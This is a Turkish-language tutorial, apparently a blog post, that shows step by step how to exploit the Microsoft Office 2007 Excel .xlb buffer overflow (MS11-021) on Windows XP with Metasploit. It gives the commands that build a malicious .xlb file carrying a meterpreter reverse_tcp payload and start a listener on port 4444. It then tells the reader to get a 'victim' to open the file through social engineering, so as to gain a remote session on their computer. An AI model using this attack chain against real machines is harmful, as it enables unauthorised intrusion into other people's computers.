Windows Xp Sp2 ve Sp3 'lerde bulunan Microsoft Office 2007 Excel .xlb Buffer Overflow zafiyetini test edelim. Ben daha önceden vwmare kurmuş olduğum XP işletim sisteminde deneyeceğim.
Kullanacağız Exploit ;
exploit/windows/fileformat/ms11_021_xlb_bof
Kali Linux'umuzu açalım ve metasploitimizi çalıştıralım. Kali'de terminalimizi açalım ve msfconsole komutumuzu yazalım.
Aşağıda bulunan Resim-1'deki gibi komutumuzu yazalım, exploitimiz ayarlarını görüntüleyelim ve çalıştıralım.
Komutumuz :
- use exploit/windows/fileformat/ms11_021_xlb_bof
RESİM - 1
Daha sonra payloadımızı çağıralım.
- set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-2
Ayarlarımızı kontrol edelim
- show options
RESİM-3
Kalimizin İp adresini ve portumuzu belirledikten sonra exploitimizi çalıştıralım.
- set LHOST {Kali Linux İp Adresinizi Yazınız}
- run
RESİM-4
- cp /root/.msf4/local/msf.xlb /root/Desktop/
RESİM-5
- use multi/handler
RESİM-6
Şimdi ise ip adresimizde 4444'lü portumuzu dinlemeye almak için payloadımızı yükleyelim.
- set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-7
Kali İp adresimizi girelim ve çalıştırıp kurbanımızın açmasını bekleyelim.
- set LHOST 192.168.5.128
- run
RESİM-8
Şimdi bize düşen karşı tarafa bu excel dosyamızı Sosyal Mühendislik yöntemleri ile gönderip açtırmak. Ben kendi Sanal makinemde kurmuş olduğum xp işletim sistemimde dosyamı açıp test ediyorum. Eğer işlemlerimizi doğru yaptıysak kurban dosyayı açtıktan sonra terminal ekranında meterpreter oturumunu almış olmamız gerekiyor. Dosyayı açıyorum.
RESİM-9
İşlem tamamdır artık kurbanımızın bilgisayarındayız.